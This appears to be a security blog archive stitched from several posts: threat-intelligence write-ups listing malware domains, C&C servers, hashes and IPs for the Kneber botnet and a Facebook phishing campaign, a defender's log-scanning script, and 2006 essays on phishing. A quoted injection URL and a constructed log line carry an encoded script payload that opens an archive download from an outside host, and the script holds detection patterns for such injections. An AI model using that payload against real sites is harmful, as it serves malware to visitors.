193.70.117.250

195.154.102.75

198.252.106.149

198.91.81.5

199.204.187.164

31.220.20.111

66.70.197.208

78.46.77.105

79.175.181.11

82.102.15.215

87.98.249.207

88.99.139.8

88.99.160.209

88.99.40.240

88.99.69.4

93.174.95.64

94.76.204.201

136.243.145.233

136.243.198.45

141.8.224.221

148.251.116.93

148.251.12.172

162.218.237.31

167.114.13.164

172.246.144.34

173.254.239.217

6.31.33.115

176.31.33.116

176.9.188.235

85.28.21.83

185.28.21.95

192.169.82.134

198.27.68.142

198.91.81.51

45.35.33.126

46.4.91.26

5.135.123.163

5.196.194.234

51.254.198.131

51.254.21.142

79.175.181.118

88.99.128.229

88.99.139.88

88.99.69.49

3.174.95.64

Stay tuned!


Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet

September 11, 2019
It's 2010 and I've recently come across compromised official Web sites of the Georgian Ministry of Defense and Ministry of Justice that were potentially participating in a widespread phishing and malware-serving campaign, enticing users into interacting with rogue U.S. Intelligence and U.S. Law Enforcement themed emails for the purpose of dropping malicious software on the targeted host's PC.


Sample malicious URL known to have participated in the campaign, abusing a common Web site redirection vulnerability:
hxxp://www.mod.gov.ge/2007/video/movie.php?l=G&v=%20%3E%20a%20href%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3EDownload%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20#05184916461921807121
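The URL above carries percent-encoded HTML and a script fragment inside the `v` parameter of a video page, so the injected markup is only visible after decoding. A defender reviewing web server logs for the same abuse can decode every query parameter and flag values that contain tags, script, a `window.open` call, a second absolute URL or a link to an archive. The script below is an added example, not the author's code; the access log lines, the `example.invalid` host and the pattern list are constructed.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Things that should never survive decoding of a video/redirect parameter value:
# markup, script, a window.open call, a second absolute URL, or an archive link.
INJECTION_PATTERNS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I)),
    ("script", re.compile(r"<\s*script|javascript:", re.I)),
    ("window_open", re.compile(r"window\s*\.\s*open", re.I)),
    ("embedded_url", re.compile(r"https?://", re.I)),
    ("archive_link", re.compile(r"\.(?:zip|exe|scr|rar)\b", re.I)),
]

# Apache combined-style lines (constructed); the second carries an encoded payload.
ACCESS_LOG = """
10.1.1.20 - - [11/Sep/2010:10:00:00 +0400] "GET /2007/video/movie.php?l=G&v=clip01 HTTP/1.1" 200 512
10.1.1.21 - - [11/Sep/2010:10:00:05 +0400] "GET /2007/video/movie.php?l=G&v=%3Ca%20href%3Dhttp%3A%2F%2Fexample.invalid%2Freport.zip%3EDownload%3C%2Fa%3E%3Cscript%3Ewindow.OPEN%28%27http%3A%2F%2Fexample.invalid%2Freport.zip%27%29%3C%2Fscript%3E HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')


def decode_value(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (double encoding is common) and unescape HTML entities."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev = value
        value = html.unescape(unquote(value))
    return value


def analyse_url(url: str) -> list:
    """Findings per query parameter whose decoded value matches an injection pattern."""
    query = urlsplit(url).query
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        decoded = decode_value(raw)
        indicators = [label for label, pat in INJECTION_PATTERNS if pat.search(decoded)]
        if indicators:
            findings.append({"param": name, "decoded": decoded, "indicators": indicators})
    return findings


def scan_access_log(log: str = ACCESS_LOG) -> list:
    """(client, param, indicators) for each request carrying injected content."""
    hits = []
    for line in log.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, path = m.groups()
        for f in analyse_url(path):
            hits.append((client, f["param"], f["indicators"]))
    return hits


if __name__ == "__main__":
    for client, param, indicators in scan_access_log():
        print(client, param, ",".join(indicators))
```

Matching on the decoded value rather than the raw log line matters: `%3Cscript%3E` and `%253Cscript%253E` both end up as `<script>` here, while a plain substring search on the raw request would miss the double-encoded form. The same decoding step is what the vulnerable page itself performs before echoing the parameter, which is why the mitigation is output encoding of the `v` value, not filtering at the log.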

Related malicious URLs known to have participated in the campaign:
hxxp://officialweightlosshelp.org/wp-admin/report.zip

Spread URL found within the config:
hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67

Related compromised malicious URLs known to have participated in the campaign:
hxxp://new.justice.gov.ge/files/Headers/in.txt
hxxp://new.justice.gov.ge/files/Headers/fresh.txt
hxxp://new.justice.gov.ge/files/Headers/rollers1.php

Related MD5s known to have participated in the campaign:
MD5: d0c0a2e6b30f451f69df9e2514ba36f2
MD5: 974a4a516260a4fafb36234897469013
MD5: ecb7304f838efb8e30a21189458b8544
MD5: 81b3bff487fc9a02e10288114fc2b5be
MD5: 234523904033f8dc692c743cbcf5cf2b
MD5: e2fffaffc1064d24e7ea6bab90fd86fc
MD5: 5941c9b5bd567c5baaecc415e453b5c8
MD5: 0ff325365f1d8395322d1ef0525f3b1f
MD5: 4437617b7095ed412f3c663d4b878c30
MD5: eb66a3e11690069b28c38cea926b61d2
MD5: 2b7e4b7c5faf45ebe48df580b63c376b

The following two domains, part of the Hilary Kneber botnet, are also known to have participated in the campaign:
hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com
hxxp://dhsorg.org - Email: hilarykneber@yahoo.com

Related malicious download location URLs known to have participated in the campaign:
hxxp://www.zeropaid.com/bbs/includes/CYBERCAFE.zip
hxxp://rapidshare.com/files/318309046/CYBERCAFE.zip.html
hxxp://www.sendspace.com/file/fmbt01
hxxp://hkcaregroup.com/modlogan/MILSOFT.zip
hxxp://rapidshare.com/files/320369638/MILSOFT.zip.html
hxxp://fcpra.org/downloads/MILSOFT.zip
hxxp://fcpra.org/downloads/winupdate.zip
hxxp://www.sendspace.com/file/tj373l
hxxp://mv.net.md/update/update.zip - 195.22.225.5
hxxp://www.sendspace.com/file/7jmxtq
hxxp://mv.net.md/dsb/DSB.zip
hxxp://www.sendspace.com/file/rdxgzd
hxxp://timingsolution.com/Doc/BULLETIN.zip
hxxp://www.sendspace.com/file/goz3yd
hxxp://dnicenter.com/docs/report.zip
hxxp://dhsorg.org/docs/instructions.zip - 222.122.60.186; 222.122.60.1
hxxp://www.sendspace.com/file/h96uh1
hxxp://depositfiles.com/files/xj1wvamc4
hxxp://tiesiog.puikiai.lt/report.zip
hxxp://somashop.lv/report.zip
hxxp://www.christianrantsen.dk/report.zip
hxxp://enigmazones.eu/report.zip

hxxp://gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN.zip
hxxp://quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.zip - 66.147.242.169

Related malicious and fraudulent domains known to have participated in the campaign:
hxxp://dhsinfo.info - 218.240.28.34
hxxp://greylogic.info - 218.240.28.34; 218.240.28.4
hxxp://intelfusion.info - 218.240.28.34

hxxp://greylogic.org - 222.122.60.1

Related malicious MD5s known to have participated in the campaign:
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5
MD5: 28c4648f05f46a3ec37d664cee0d84a8

Once executed, a sample phones back to the following C&C servers:
hxxp://from-us-with-love.info - 91.216.141.171
hxxp://from-us-with-love.info/imglov/zmpt4d/n16v18.bin
hxxp://vittles.mobi - 174.132.255.10

hxxp://nicupdate.com - 85.31.97.194

Related malicious and fraudulent IPs known to have participated in the Hilary Kneber botnet campaign:
hxxp://58.218.199.239
hxxp://59.53.91.102
hxxp://60.12.117.147
hxxp://61.235.117.71
hxxp://61.235.117.86
hxxp://61.4.82.216
hxxp://193.104.110.88
hxxp://95.169.186.103
hxxp://222.122.60.186
hxxp://217.23.10.19
hxxp://85.17.144.78
hxxp://200.106.149.171
hxxp://200.63.44.192
hxxp://200.63.46.134
hxxp://91.206.231.189
hxxp://124.109.3.135
hxxp://61.61.20.134
hxxp://91.206.201.14
hxxp://91.206.201.222
hxxp://91.206.201.8
hxxp://216.104.40.218
hxxp://69.197.128.203

Related malicious and fraudulent domains known to have participated in the Hilary Kneber botnet campaign:
hxxp://123.30d5546ce2d9ab37.d99q.cn
hxxp://d99q.cn
hxxp://524ay.cn
hxxp://adcounters.net
hxxp://adobe-config-s3.net
hxxp://mywarworld.cn
hxxp://aqaqaqaq.com
hxxp://avchecker123.com
hxxp://bizelitt.com
hxxp://biznessnews.cn
hxxp://bizuklux.cn
hxxp://fcrazy.com
hxxp://fcrazy.eu
hxxp://boolred.in
hxxp://brans.pl
hxxp://britishsupport.net
hxxp://bulkbin.cn
hxxp://chaujoi.cn
hxxp://checkvirus.net
hxxp://chinaoilfactory.cn
hxxp://chris25project.cn
hxxp://client158.faster-hosting.com
hxxp://cwbnewsonline.cn
hxxp://cxzczxccc.com.cn
hxxp://dasfkjsdsfg.biz
hxxp://dia2.cn
hxxp://digitalinspiration.e37z.cn
hxxp://dolbanov.net
hxxp://dolcegabbana.djbormand.cn
hxxp://djbormand.cn
hxxp://download.sttcounter.cn - 61.61.20.134; 211.95.78.98
hxxp://sttcounter.cn
hxxp://dred3.cn
hxxp://dsfad.in
hxxp://e37z.cn
hxxp://e58z.cn
hxxp://electrofunny.cn
hxxp://electromusicnow.cn
hxxp://elsemon.cn
hxxp://fcrazy.info
hxxp://filemarket.net
hxxp://flo5.cn
hxxp://footballcappers.biz
hxxp://fobsl.cn
hxxp://forum.d99q.cn
hxxp://gamno6.cn
hxxp://gidrasil.cn
hxxp://gifts2010.net
hxxp://ginmap.cn
hxxp://giopnon.cn
hxxp://gksdh.cn
hxxp://glousc.com
hxxp://gnfdt.cn
hxxp://gold-smerch.cn
hxxp://goldenmac.cn
hxxp://google.maniyakat.cn
hxxp://maniyakat.cn
hxxp://greenpl.com
hxxp://grizzli-counter.com
hxxp://grobin1.cn
hxxp://inpanel.cn
hxxp://itmasterz.org
hxxp://iuylqb.cn
hxxp://kaizerr.org
hxxp://keepmeupdated.cn
hxxp://khalej.cn
hxxp://kimosimotuma.cn
hxxp://klaikius.com
hxxp://klitar.cn
hxxp://kolordat482.com
hxxp://kotopes.cn
hxxp://liagand.cn
hxxp://love2coffee.cn
hxxp://majorsoftwareupdate.info
hxxp://marcusmed.com
hxxp://mcount.net
hxxp://mega-counter.com
hxxp://monstersoftware.info
hxxp://morsayniketamere.cn
hxxp://mydailymail.cn
hxxp://mynewworldorder.cn
hxxp://newsdownloads.cn
hxxp://nit99.biz
hxxp://nm.fcrazy.com
hxxp://nmalodbp.com
hxxp://not99.biz
hxxp://online-counter.cn
hxxp://pedersii.net
hxxp://piramidsoftware.info
hxxp://popupserf.cn
hxxp://qaqaqaqa.com
hxxp://qaqaqaqa.net
hxxp://qbxq16.com
hxxp://redlinecompany.ravelotti.cn
hxxp://ravelotti.cn
hxxp://relevant-information.cn

Related Hilary Kneber botnet posts:
Keeping Money Mule Recruiters on a Short Leash
Standardizing the Money Mule Recruitment Process
Dissecting the Exploits/Scareware Serving Twitter Spam Campaign
Koobface Botnet Starts Serving Client-Side Exploits

Historical OSINT - Zeus and Client-Side Exploit Serving Facebook Phishing Campaign Spotted in the Wild

December 23, 2016
In a cybercrime ecosystem dominated by fraudulent propositions, cybercriminals continue actively populating their botnets' infected population with hundreds of thousands of newly affected users globally, potentially compromising the confidentiality, integrity and availability of the affected hosts to a multitude of malicious software, and further earning fraudulent revenue in the process of monetizing the affected botnet's population, largely relying on an affiliate-based type of fraudulent revenue monetization scheme.

We've recently intercepted a currently circulating malicious spam campaign impersonating Facebook for the purpose of serving client-side exploits to socially engineered users, further compromising the confidentiality, integrity and availability of the affected hosts to a multitude of malicious software, and earning fraudulent revenue in the process of monetizing the affected hosts, largely relying on an affiliate-based type of fraudulent revenue monetization scheme.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample URL exploitation chain:
hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php
    - hxxp://wqdfr.salefale.com/index.php - 62.193.127.197
        - hxxp://spain.salefale.com/index.php

Related malicious domains known to have participated in the campaign:
hxxp://salefale.com - 112.137.165.114
    - hxxp://countrtds.ru - 91.201.196.102 - Email: thru@freenetbox.ru
       
Sample detection rate for the malicious executable:
MD5: e96c8d23e3b64d79e5e134a9633d6077
MD5: 19d9cc4d9d512e60f61746ef4c741f09

Once executed, a sample phones back to:
hxxp://makotoro.com

Related malicious C&C server IPs known to have participated in the campaign:
hxxp://91.201.196.99
hxxp://91.201.196.77
hxxp://91.201.196.101
hxxp://91.201.196.35
hxxp://91.201.196.75
hxxp://91.201.196.76
hxxp://91.201.196.38
hxxp://91.201.196.34
hxxp://91.201.196.37

Related malicious domains, resolving to the C&C server IP 212.175.173.88, known to have participated in the campaign:
hxxp://downloads.fileserversa.org
hxxp://downloads.fileserversc.org
hxxp://downloads.fileserversd.org
hxxp://downloads.portodrive.org
hxxp://downloads.fileserversj.org
hxxp://downloads.fileserversk.org
hxxp://downloads.fileserversm.org
hxxp://downloads.fileserversn.org
hxxp://downloads.fileserverso.org
hxxp://downloads.fileserversq.org
hxxp://downloads.fileserversr.org
hxxp://auth.facebook.com.megavids.org
hxxp://auth.facebook.com.fileserversl.com
hxxp://auth.facebook.com.legomay.com
hxxp://auth.facebook.com.crymyway.com
hxxp://auth.facebook.com.portodrive.net
hxxp://auth.facebook.com.modavedis.net
hxxp://auth.facebook.com.migpix.net
hxxp://auth.facebook.com.legomay.net
hxxp://auth.facebook.com.crymyway.net
hxxp://downloads.megavids.org
hxxp://downloads.regzavids.org
hxxp://downloads.vedivids.org
hxxp://downloads.restpictures.org
hxxp://downloads.modavedis.org
hxxp://downloads.fileserverst.org
hxxp://downloads.fileserversu.org
hxxp://downloads.regzapix.org
hxxp://downloads.reggiepix.org
hxxp://downloads.migpix.org
hxxp://downloads.restopix.org
hxxp://downloads.legomay.org
hxxp://downloads.vediway.org
hxxp://downloads.compoway.org
hxxp://downloads.restway.org
hxxp://downloads.crymyway.org
hxxp://downloads.fileserversa.com
hxxp://downloads.fileserversb.com
hxxp://downloads.fileserversc.com
hxxp://downloads.fileserversd.com
hxxp://downloads.fileserverse.com
hxxp://downloads.fileserversf.com
hxxp://downloads.fileserversg.com
hxxp://downloads.fileserversh.com
hxxp://downloads.fileserversi.com
hxxp://downloads.fileserversj.com
hxxp://downloads.fileserversk.com
hxxp://downloads.fileserversl.com
hxxp://downloads.fileserversm.com
hxxp://downloads.fileserversn.com
hxxp://downloads.fileserverso.com
hxxp://downloads.fileserversp.com
hxxp://downloads.fileserversq.com
hxxp://downloads.fileserversr.com
hxxp://downloads.regzavids.com
hxxp://downloads.vedivids.com
hxxp://downloads.restpictures.com
hxxp://downloads.modavedis.com
hxxp://downloads.fileserverss.com
hxxp://downloads.fileserverst.com
hxxp://downloads.fileserversu.com
hxxp://downloads.regzapix.com
hxxp://downloads.reggiepix.com
hxxp://downloads.migpix.com
hxxp://downloads.legomay.com
hxxp://downloads.vediway.com
hxxp://downloads.compoway.com
hxxp://downloads.crymyway.com
hxxp://downloads.fileserversa.net
hxxp://downloads.fileserversb.net
hxxp://downloads.fileserversc.net
hxxp://downloads.fileserversd.net
hxxp://downloads.fileserverse.net
hxxp://downloads.portodrive.net
hxxp://downloads.fileserversf.net
hxxp://downloads.fileserversg.net
hxxp://downloads.fileserversh.net
hxxp://downloads.fileserversi.net
hxxp://downloads.fileserversj.net
hxxp://downloads.fileserversk.net
hxxp://downloads.fileserversl.net
hxxp://downloads.fileserversm.net
hxxp://downloads.fileserversn.net
hxxp://downloads.fileserverso.net
hxxp://downloads.fileserversp.net
hxxp://downloads.fileserversq.net
hxxp://downloads.fileserversr.net
hxxp://downloads.regzavids.net
hxxp://downloads.vedivids.net
hxxp://downloads.tastyfiles.net
hxxp://downloads.restpictures.net
hxxp://downloads.modavedis.net
hxxp://downloads.fileserverss.net
hxxp://downloads.fileserverst.net
hxxp://downloads.fileserversu.net
hxxp://downloads.regzapix.net
hxxp://downloads.reggiepix.net
hxxp://downloads.migpix.net
hxxp://downloads.legomay.net
hxxp://downloads.vediway.net
hxxp://downloads.compoway.net
hxxp://downloads.restway.net
hxxp://downloads.crymyway.net

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Fighting Internet's email junk through licensing

April 14, 2006
Just came across this story at Slashdot; an interesting approach:



"China has introduced regulations that make it illegal to run an email server without a licence. The new rules, which came into force two weeks ago, mean that most companies running their own email servers in China are now breaking the law. The new email licensing clause is just a small part of a new anti-spam law formulated by China's Ministry of Information Industry (MII)."



While the commitment is a remarkable event given China's booming Internet population -- among the main reasons Google had to somehow enter China's search market and take market share from Baidu.com -- you don't need a mail server to disseminate spam and phishing attacks like you used to in the old days. You need botnets: going through CME's list, you would see how the majority of today's malware is loaded with a built-in SMTP engine, and even with offline/in-transit/web email harvesting modules.



You can often find China on the top of every recently released spam/phishing/botnet trends summary, which doesn't mean Chinese Internet users are insecure -- just unaware. What you can do is educate the masses to secure the entire population, and stimulate the growth of the local security market that everyone is so desperately trying to tap into.


Moreover, I doubt you can regulate the type of Internet users still trying to freely access information, again with the wrong attitude with respect to security:



"..prohibiting use of email to discuss certain vaguely defined subjects related to 'network security' and ' information security', and also reiterate that emails which contain content contrary to existing laws must not be copied or forwarded. Wide-ranging laws of this nature have been used against political and religious dissenters in the past."



It's like legally justifying the country's censorship practices by introducing the law, whereas I feel "network security" and "information security" attacks outside the homeland get favored compared to internal ones, don't you?



Forbidden fruits turn into dangerous desires on the majority of occasions, and you just can't control that, let alone censor it.




Heading in the opposite direction

April 05, 2006
Just one day before April 1st, 2006, I came across this article:



"German retail banker Postbank will begin using electronic signatures on e-mails to its customers to help protect them from phishing attacks."



Catching up with the phishers seems to be a very worrisome future strategy. Electronic signatures by themselves are rarely checked by anyone, and many more attack vectors are making the idea totally irrelevant. Moreover, a great research paper, "Why Phishing Works", was recently released, and it basically outlines basic facts such as how end users don't pay attention to security checks, if there's even a definition of such given the attack vectors phishers have started using recently. In some of my previous posts, "Security threats to consider when doing E-Banking" and "Anti Phishing toolbars - can you trust them?", I mentioned many other problems related to this bigger-than-it-seems problem; what you should also keep an eye on is the good old ATM scam, which I hope you are aware of.



Postbank is often targeted by phishers; still, the best protection is the level of security awareness stated here:



"Phishing attacks have led 80% of Germans to distrust banking related e-mails, according to TNS Infratest." Moreover, "Postbank's electronic signature service isn't possible with web-based e-mail services provided by local Internet service providers such as GMX GmbH and Freenet.de AG, according to Ebert. One exception is Web.de"



Thankfully, but that's when you are going in exactly the opposite direction to your customers while trying to establish a reputable bank-to-customer relationship over email. Listen to your customers first, follow the trends, and do not try to use the most popular dissemination vector as a future communication channel.



Something else with respect to recent phishing statistics: the key summary points of the recently released AntiPhishingGroup report for January 2006:



• Number of unique phishing reports received in January: 17,877
• Number of unique phishing sites received in January: 9715
• Number of brands hijacked by phishing campaigns in January: 101
• Number of brands comprising the top 80% of phishing campaigns in January: 6
• Country hosting the most phishing websites in January: United States
• Contain some form of target name in URL: 45 %
• No hostname just IP address: 30 %
• Percentage of sites not using port 80: 8 %
• Average time online for site: 5.0 days
• Longest time online for site: 31 days




I feel there's a lot more to expect than trying to re-establish the communication over a broken channel, as far as E-banking is concerned.



More resources you might be interested in taking a look at are:
Vulnerability of First-Generation Digital Certificates and Potential for Phishing Attacks
Netcraft: More than 450 Phishing Attacks Used SSL in 2005
SSL's Credibility as Phishing Defense Is Tested
Rootkit Pharming
The future of Phishing
Something is Phishy here...
Phishing Site Using Valid SSL Certificates
Thoughts on Using SSL/TLS Certificates as the Solution to Phishing




Anti Phishing toolbars - can you trust them?

March 06, 2006
A lot of recent phishing events occurred, and what should be mentioned is their constant ambition towards increasing the number of trust points between end users and the mirror version of the original site. The use of SSL, and the ease of obtaining a valid certificate for a to-be fraudulent domain, is a fairly simple practice. Phishing is so much more than this, and it even has to do with buying 0day vulnerabilities to keep itself competitive.


How should phishing be fought? Educating the end user not to trust that he/she is on Amazon.com when he just typed it, or enforcing a technological solution to the problem of digital social engineering and trust building? As far as trends are concerned, according to the AntiPhishingGroup's latest report:



• Number of unique phishing reports received in December: 15244
• Number of unique phishing sites received in December: 7197
• Number of brands hijacked by phishing campaigns in December: 121
• Number of brands comprising the top 80% of phishing campaigns in December: 7
• Country hosting the most phishing websites in December: United States
• Contain some form of target name in URL: 51 %
• No hostname just IP address: 32 %
• Percentage of sites not using port 80: 7 %
• Average time online for site: 5.3 days
• Longest time online for site: 31 days



In case you haven't come across the research "Do Security Toolbars Actually Prevent Phishing Attacks?", you'll find that it has very good points and actual evidence. Anti-phishing filters and toolbar protection are gaining popularity, and many popular companies are fighting for market share of the end users' desktop, but keep in mind that:



"We conducted two user studies of three security toolbars and other browser security indicators and found them all ineffective at preventing phishing attacks. Even though subjects were asked to pay attention to the toolbar, many failed to look at it; others disregarded or explained away the toolbars’ warnings if the content of web pages looked legitimate. We found that many subjects do not understand phishing attacks or realize how sophisticated such attacks can be."



The topic of phishing and fighting the problem has again been greatly extended by the researcher Min Xu, who wrote the thesis "Fighting Phishing at the User Interface" and introduced a solution that measures a site's reputation and trustworthiness. While this is among the simplest signals Google uses while assigning PageRank, I find it a common-sense warning. Still, with the constant flood of Web 2.0 companies, does it matter? :) Check out some screenshots from this outstanding thesis and get the point:


Localizing the attacks, taking advantage of the momentum or of a software vulnerability within a popular browser or the site itself, as well as taking advantage of malware, are among the most common practices these days. Moreover, I feel that fighting phishing the wrong way could, on the other hand, erode the end user's trust in the Web, so do your homework on the social impact of anything you do. NetCraft's Anti-Phishing toolbar is nevertheless my favorite combination of them all; still, awareness and a lack of naivety when it comes to transactions or authentication is the perfect tool. What about yours?



Some resources worth mentioning are:

Candid's “Phishing in the middle of the stream” Today’s threats to online banking
Know your Enemy : Phishing
Phishing attacks and countermeasures
The Phishing Guide
Distributed Phishing Attacks
Phishiest Countries
MailFrontier Phishing IQ Test
Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures


